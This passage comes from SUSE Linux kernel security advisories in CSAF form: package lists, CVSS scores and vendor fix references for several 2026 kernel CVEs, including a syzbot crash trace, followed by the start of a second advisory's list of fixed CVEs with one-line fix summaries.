"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
SUSE-SU-2026:20477-1
Vulnerability from csaf_suse - Published: 2026-02-24 10:42 - Updated: 2026-02-24 10:42Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise Micro 6.0 and Micro 6.1 kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).
- CVE-2025-38321: smb: Log an error when close_all_cached_dirs fails (bsc#1246328).
- CVE-2025-38728: smb3: fix for slab out of bounds on mount to ksmbd (bsc#1249256).
- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).
- CVE-2025-39890: wifi: ath12k: fix memory leak in ath12k_service_ready_ext_event (bsc#1250334).
- CVE-2025-39977: futex: Prevent use-after-free during requeue-PI (bsc#1252046).
- CVE-2025-40006: mm/hugetlb: fix folio is still mapped when deleted (bsc#1252342).
- CVE-2025-40024: vhost: Take a reference on the task in struct vhost_task (bsc#1252686).
- CVE-2025-40033: remoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable() (bsc#1252824).
- CVE-2025-40042: tracing: Fix race condition in kprobe initialization causing NULL pointer dereference (bsc#1252861).
- CVE-2025-40053: net: dlink: handle copy_thresh allocation failure (bsc#1252808).
- CVE-2025-40081: perf: arm_spe: Prevent overflow in PERF_IDX2OFF() (bsc#1252776).
- CVE-2025-40102: KVM: arm64: Prevent access to vCPU events before init (bsc#1252919).
- CVE-2025-40123: bpf: Enforce expected_attach_type for tailcall compatibility (bsc#1253365).
- CVE-2025-40134: dm: fix NULL pointer dereference in __dm_suspend() (bsc#1253386).
- CVE-2025-40135: ipv6: use RCU in ip6_xmit() (bsc#1253342).
- CVE-2025-40153: mm: hugetlb: avoid soft lockup when mprotect to large memory area (bsc#1253408).
- CVE-2025-40158: ipv6: use RCU in ip6_output() (bsc#1253402).
- CVE-2025-40160: xen/events: Cleanup find_virq() return codes (bsc#1253400).
- CVE-2025-40167: ext4: detect invalid INLINE_DATA + EXTENTS flag combination (bsc#1253458).
- CVE-2025-40170: net: use dst_dev_rcu() in sk_setup_caps() (bsc#1253413).
- CVE-2025-40178: pid: Add a judgment for ns null in pid_nr_ns (bsc#1253463).
- CVE-2025-40179: ext4: verify orphan file size is not too big (bsc#1253442).
- CVE-2025-40187: net/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce() (bsc#1253647).
- CVE-2025-40190: ext4: guard against EA inode refcount underflow in xattr update (bsc#1253623).
- CVE-2025-40215: kABI: xfrm: delete x->tunnel as we delete x (bsc#1254959).
- CVE-2025-40220: fuse: fix livelock in synchronous file put from fuseblk workers (bsc#1254520).
- CVE-2025-40231: vsock: fix lock inversion in vsock_assign_transport() (bsc#1254815).
- CVE-2025-40233: ocfs2: clear extent cache after moving/defragmenting extents (bsc#1254813).
- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).
- CVE-2025-40240: sctp: avoid NULL dereference when chunk data buffer is missing (bsc#1254869).
- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).
- CVE-2025-40248: vsock: Ignore signal/timeout on connect() if already established (bsc#1254864).
- CVE-2025-40250: net/mlx5: Clean up only new IRQ glue on request_irq() failure (bsc#1254854).
- CVE-2025-40251: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy (bsc#1254856).
- CVE-2025-40252: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() (bsc#1254849).
- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1254843).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).
- CVE-2025-40268: cifs: client: fix memory leak in smb3_fs_context_parse_param (bsc#1255082).
- CVE-2025-40271: fs/proc: fix uaf in proc_readdir_de() (bsc#1255297).
- CVE-2025-40274: KVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying (bsc#1254830).
- CVE-2025-40278: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak (bsc#1254825).
- CVE-2025-40279: net: sched: act_connmark: initialize struct tc_ife to fix kernel leak (bsc#1254846).
- CVE-2025-40280: tipc: Fix use-after-free in tipc_mon_reinit_self() (bsc#1254847).
- CVE-2025-40287: exfat: fix improper check of dentry.stream.valid_size (bsc#1255030).
- CVE-2025-40289: drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM (bsc#1255042).
- CVE-2025-40292: virtio-net: fix received length check in big packets (bsc#1255175).
- CVE-2025-40293: iommufd: Don't overflow during division for dirty tracking (bsc#1255179).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255187).
- CVE-2025-40307: exfat: validate cluster allocation bits of the allocation bitmap (bsc#1255039).
- CVE-2025-40319: bpf: Sync pending IRQ work before freeing ring buffer (bsc#1254794).
- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).
- CVE-2025-40331: sctp: Prevent TOCTOU out-of-bounds write (bsc#1254615).
- CVE-2025-40337: net: stmmac: Correctly handle Rx checksum offload errors (bsc#1255081).
- CVE-2025-40338: ASoC: Intel: avs: Do not share the name pointer between components (bsc#1255273).
- CVE-2025-40339: drm/amdgpu: fix nullptr err of vm_handle_moved (bsc#1255428).
- CVE-2025-40346: arch_topology: Fix incorrect error check in topology_parse_cpu_capacity() (bsc#1255318).
- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).
- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).
- CVE-2025-40360: drm/sysfb: Do not dereference NULL pointer in plane reset (bsc#1255095).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68190: drm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked() (bsc#1255131).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68201: drm/amdgpu: remove two invalid BUG_ON()s (bsc#1255136).
- CVE-2025-68204: pmdomain: arm: scmi: Fix genpd leak on provider registration failure (bsc#1255224).
- CVE-2025-68206: netfilter: nft_ct: add seqadj extension for natted connections (bsc#1255142).
- CVE-2025-68208: bpf: account for current allocated stack depth in widen_imprecise_scalars() (bsc#1255227).
- CVE-2025-68209: mlx5: Fix default values in create CQ (bsc#1255230).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68230: drm/amdgpu: fix gpu page fault after hibernation on PF passthrough (bsc#1255134).
- CVE-2025-68239: binfmt_misc: restore write access before closing files opened by open_exec() (bsc#1255272).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68255: staging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing (bsc#1255395).
- CVE-2025-68259: KVM: SVM: Don't skip unrelated instruction if INT3/INTO is replaced (bsc#1255199).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68264: ext4: refresh inline data size before write operations (bsc#1255380).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68340: team: Move team device type change at the end of team_port_add (bsc#1255507).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68363: bpf: Check skb->transport_header is set in bpf_skb_check_mtu (bsc#1255552).
- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68378: bpf: Refactor stack map trace depth calculation into helper function (bsc#1255614).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).
- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).
- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).
- CVE-2025-68742: bpf: Improve program stats run-time calculation (bsc#1255707).
